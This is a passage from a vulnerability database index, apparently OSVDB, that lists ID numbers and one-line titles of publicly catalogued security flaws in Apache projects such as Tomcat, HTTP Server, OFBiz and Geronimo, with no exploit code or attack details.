15636| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
15637| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
15638| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
15639| [65054] Apache ActiveMQ Jetty Error Handler XSS
15640| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
15641| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
15642| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
15643| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
15644| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
15645| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
15646| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
15647| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
15648| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
15649| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
15650| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
15651| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
15652| [63895] Apache HTTP Server mod_headers Unspecified Issue
15653| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
15654| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
15655| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
15656| [63140] Apache Thrift Service Malformed Data Remote DoS
15657| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
15658| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
15659| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
15660| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
15661| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
15662| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
15663| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
15664| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
15665| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
15666| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
15667| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
15668| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
15669| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
15670| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
15671| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
15672| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
15673| [60678] Apache Roller Comment Email Notification Manipulation DoS
15674| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
15675| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
15676| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
15677| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
15678| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
15679| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
15680| [60232] PHP on Apache php.exe Direct Request Remote DoS
15681| [60176] Apache Tomcat Windows Installer Admin Default Password
15682| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
15683| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
15684| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
15685| [59944] Apache Hadoop jobhistory.jsp XSS
15686| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
15687| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
15688| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
15689| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
15690| [59019] Apache mod_python Cookie Salting Weakness
15691| [59018] Apache Harmony Error Message Handling Overflow
15692| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
15693| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
15694| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
15695| [59010] Apache Solr get-file.jsp XSS
15696| [59009] Apache Solr action.jsp XSS
15697| [59008] Apache Solr analysis.jsp XSS
15698| [59007] Apache Solr schema.jsp Multiple Parameter XSS
15699| [59006] Apache Beehive select / checkbox Tag XSS
15700| [59005] Apache Beehive jpfScopeID Global Parameter XSS
15701| [59004] Apache Beehive Error Message XSS
15702| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
15703| [59002] Apache Jetspeed default-page.psml URI XSS
15704| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
15705| [59000] Apache CXF Unsigned Message Policy Bypass
15706| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
15707| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
15708| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
15709| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
15710| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
15711| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
15712| [58993] Apache Hadoop browseBlock.jsp XSS
15713| [58991] Apache Hadoop browseDirectory.jsp XSS
15714| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
15715| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
15716| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
15717| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
15718| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
15719| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
15720| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
15721| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
15722| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
15723| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
15724| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
15725| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
15726| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
15727| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
15728| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
15729| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
15730| [58974] Apache Sling /apps Script User Session Management Access Weakness
15731| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
15732| [58931] Apache Geronimo Cookie Parameters Validation Weakness
15733| [58930] Apache Xalan-C++ XPath Handling Remote DoS
15734| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
15735| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
15736| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
15737| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
15738| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
15739| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
15740| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
15741| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
15742| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
15743| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
15744| [58805] Apache Derby Unauthenticated Database / Admin Access
15745| [58804] Apache Wicket Header Contribution Unspecified Issue
15746| [58803] Apache Wicket Session Fixation
15747| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
15748| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
15749| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
15750| [58799] Apache Tapestry Logging Cleartext Password Disclosure
15751| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
15752| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
15753| [58796] Apache Jetspeed Unsalted Password Storage Weakness
15754| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
15755| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
15756| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
15757| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
15758| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
15759| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
15760| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
15761| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
15762| [58775] Apache JSPWiki preview.jsp action Parameter XSS
15763| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
15764| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
15765| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
15766| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
15767| [58770] Apache JSPWiki Group.jsp group Parameter XSS
15768| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
15769| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
15770| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
15771| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
15772| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
15773| [58763] Apache JSPWiki Include Tag Multiple Script XSS
15774| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
15775| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
15776| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
15777| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
15778| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
15779| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
15780| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
15781| [58755] Apache Harmony DRLVM Non-public Class Member Access
15782| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
15783| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
15784| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
15785| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
15786| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
15787| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
15788| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
15789| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
15790| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
15791| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
15792| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
15793| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
15794| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
15795| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
15796| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
15797| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
15798| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
15799| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
15800| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
15801| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
15802| [58725] Apache Tapestry Basic String ACL Bypass Weakness
15803| [58724] Apache Roller Logout Functionality Failure Session Persistence
15804| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
15805| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
15806| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
15807| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
15808| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
15809| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
15810| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
15811| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
15812| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
15813| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
15814| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
15815| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
15816| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
15817| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
15818| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
15819| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
15820| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
15821| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
15822| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
15823| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
15824| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
15825| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
15826| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
15827| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
15828| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
15829| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
15830| [58687] Apache Axis Invalid wsdl Request XSS
15831| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
15832| [58685] Apache Velocity Template Designer Privileged Code Execution
15833| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
15834| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
15835| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
15836| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
15837| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
15838| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
15839| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
15840| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
15841| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
15842| [58667] Apache Roller Database Cleartext Passwords Disclosure
15843| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
15844| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
15845| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
15846| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
15847| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
15848| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
15849| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
15850| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
15851| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
15852| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
15853| [56984] Apache Xerces2 Java Malformed XML Input DoS
15854| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
15855| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
15856| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
15857| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
15858| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
15859| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
15860| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
15861| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
15862| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
15863| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
15864| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
15865| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
15866| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
15867| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
15868| [55056] Apache Tomcat Cross-application TLD File Manipulation
15869| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
15870| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
15871| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
15872| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
15873| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
15874| [54589] Apache Jserv Nonexistent JSP Request XSS
15875| [54122] Apache Struts s:a / s:url Tag href Element XSS
15876| [54093] Apache ActiveMQ Web Console JMS Message XSS
15877| [53932] Apache Geronimo Multiple Admin Function CSRF
15878| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
15879| [53930] Apache Geronimo /console/portal/ URI XSS
15880| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
15881| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
15882| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
15883| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
15884| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
15885| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
15886| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
15887| [53380] Apache Struts Unspecified XSS
15888| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
15889| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
15890| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
15891| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
15892| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
15893| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
15894| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
15895| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
15896| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
15897| [51151] Apache Roller Search Function q Parameter XSS
15898| [50482] PHP with Apache php_value Order Unspecified Issue
15899| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
15900| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
15901| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
15902| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
15903| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
15904| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
15905| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
15906| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
15907| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
15908| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
15909| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
15910| [47096] Oracle Weblogic Apache Connector POST Request Overflow
15911| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
15912| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
15913| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
15914| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
15915| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
15916| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
15917| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
15918| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
15919| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
15920| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
15921| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
15922| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
15923| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
15924| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
15925| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
15926| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
15927| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
15928| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
15929| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
15930| [43452] Apache Tomcat HTTP Request Smuggling
15931| [43309] Apache Geronimo LoginModule Login Method Bypass
15932| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
15933| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
15934| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
15935| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
15936| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
15937| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
15938| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
15939| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
15940| [42091] Apache Maven Site Plugin Installation Permission Weakness
15941| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
15942| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
15943| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
15944| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
15945| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
15946| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
15947| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
15948| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
15949| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
15950| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
15951| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
15952| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
15953| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
15954| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
15955| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
15956| [40262] Apache HTTP Server mod_status refresh XSS
15957| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
15958| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
15959| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
15960| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
15961| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
15962| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
15963| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
15964| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
15965| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
15966| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
15967| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
15968| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
15969| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
15970| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
15971| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
15972| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
15973| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
15974| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
15975| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
15976| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
15977| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
15978| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
15979| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
15980| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
15981| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
15982| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
15983| [36080] Apache Tomcat JSP Examples Crafted URI XSS
15984| [36079] Apache Tomcat Manager Uploaded Filename XSS
15985| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
15986| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
15987| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
15988| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
15989| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
15990| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
15991| [34881] Apache Tomcat Malformed Accept-Language Header XSS
15992| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
15993| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
15994| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
15995| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
15996| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
15997| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
15998| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
15999| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16000| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16001| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16002| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16003| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16004| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16005| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16006| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16007| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16008| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16009| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16010| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16011| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16012| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16013| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16014| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16015| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16016| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16017| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16018| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
